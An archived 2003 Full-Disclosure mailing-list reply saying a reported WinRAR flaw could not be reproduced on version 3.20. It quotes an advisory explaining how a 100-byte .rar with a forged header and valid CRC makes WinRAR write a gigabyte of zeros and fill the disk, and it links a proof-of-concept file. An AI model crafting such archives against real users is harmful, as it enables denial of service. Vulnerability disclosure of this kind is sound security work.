RE: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files

• Previous message: _MAX_: "[Full-Disclosure] corrected statement / question LEAP/Radius"
• Maybe in reply to: Bipin Gautam: "[Full-Disclosure] Winrar doesn't determine the actual size of compressed files"
• Next in thread: Rainer Gerhards: "RE: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

To: <door_hUNT3R@blackcodemail.com>, <full-disclosure@lists.netsys.com>
Date: Tue, 9 Sep 2003 14:49:31 +0200

tested with 3.20 - can't reproduce. It says "file is corrupt", I press "close" - nothing happened....

Rainer

> -----Original Message-----
> From: Bipin Gautam [mailto:door_hUNT3R@blackcodemail.com]
> Sent: Tuesday, September 09, 2003 1:02 PM
> To: full-disclosure@lists.netsys.com
> Subject: [Full-Disclosure] Winrar doesn't determine the
> actual size of compressed files
>
>
> ---[ about WinRAR]---
> Winrar (http://www.rarsoft.com/) is one of the most popular
> file compression utilities for Windows.
>
> --[summary]---
> Winrar incorrectly determines the actual size of compressed
> files saved in .rar format by reading it's header information.
>
> --[details]--
> Recently we managed to devise a technique to spoof the header
> and creating a valid CRC checksum. Later we found that Winrar
> only depends on it's header information and CRC check sum to
> determine the size and integrity of .rar files. Before
> uncompressing .rar files, Winrar pre-allocates space
> according to the actual file size specified in the header to
> avoid fragmentation.But pre-allocation occurs without
> checking the available hdd space. Then it goes extracting,
> even if the hdd size is less than the size of the files.We
> did a test by extracting 1GB files in a hdd with 700MB free space.
>
> Surprisingly, we later discover that even in detecting of
> header corruption WinRAR doesn't enforce to avoid extraction
> process. this lead WinRAR to believe that the actual size is
> correct .We managed to exploit this and create a proof of
> concept to demonstrate this problem by changing the actual
> file size in it's header. When it starts extracting it
> doesn't find any valid data in the archive and on the basis
> of it's header it attempts to extract 1 gigabyte of data and
> simply goes on writing "0x00" filling up valuable hdd space.
>
> --[Proof of concept]--
> The proof of concept is a valid .rar file which is just 100
> bytes but it's header has been forged to fool Winrar into
> thinking that it's a 1 gigabyte file by forging it's header
> and creating a valid CRC checksum. All versions of Winrar
> (upto 3.20 - latest version till date) seem to be vulnerable.
>
> The proof of concept of .rar file can be obtained from the
> following URL: http://www.geocities.com/visitbipin/test123.zip
> If you extract the file Winrar will try to extract this 100
> bytes .rar file trusting the information in it's header but
> not on the basis of it's data integrity.
>
> --[Background Information]--
> This bug was originally discovered by hUNT3R, a member of 01
> Security Sumbission. The vendor was notified via email.
> Further discussion took place in 01 Security Sumbission's
> forum with the developer of Winrar (Eugene Roshal) :
> URL: http://www.ysgnet.com/phorum/read.php?f=1&i=341&t=324#reply_341
>
> ---[about 01 security submission]---
> 01s.s is a small group having experience as security
> specialists, programmers and system administrators
> http://www.ysgnet.com/hn.
>
>
>
> | .oÛ_Oo.h»UNTER.oO_Ûo. |
> § !¹007Õ°¿ÑïÞÎß°Õæ9*½¹! ‡
>
> _____________________________________________________________
> Secure mail ---> http://www.blackcode.com
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html

• Previous message: _MAX_: "[Full-Disclosure] corrected statement / question LEAP/Radius"
• Maybe in reply to: Bipin Gautam: "[Full-Disclosure] Winrar doesn't determine the actual size of compressed files"
• Next in thread: Rainer Gerhards: "RE: [Full-Disclosure] Winrar doesn't determine the actual size of compressed files"
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Relevant Pages RE: [Full-Disclosure] Winrar doesnt determine the actual size of compressed files ... > files saved in .rar format by reading it's header information. ... Later we found that Winrar ... > If you extract the file Winrar will try to extract this 100 ... (Full-Disclosure) RE: [Full-Disclosure] Winrar doesnt determine the actual size of compressed files ... discussion took place in 01 Security Sumbission's ... >> files saved in .rar format by reading it's header information. ... Later we found that Winrar ... >> If you extract the file Winrar will try to extract this 100 ... (Full-Disclosure) Re: OT: ISO/RAR files - how to process? ... >> Winrar: Extract the big rar into the compenent .rar and rnn files ... >> Then us winrar again on the new .rar file, which I assume will give you ... Black with extra black bits ... (uk.rec.motorcycles) Re: [Full-Disclosure] Antivirus/Trojan/Spyware scanners DoS! ... > This comes when extracting module doesn't verify the ... > intgerity of headers. ... > similar types of breaches were found in WinRAR. ... to 12 Gb if you try to extract the ... (Full-Disclosure) Winrar doesnt determine the actual size of compressed files+possibility of DoS attack on server! ... Winrar incorrectly determines the actual size of compressed files saved ... in .rar format by reading it's header information. ... Before uncompressing .rar files, Winrar pre- ... Then it goes extracting, even if the hdd size is ... (Bugtraq)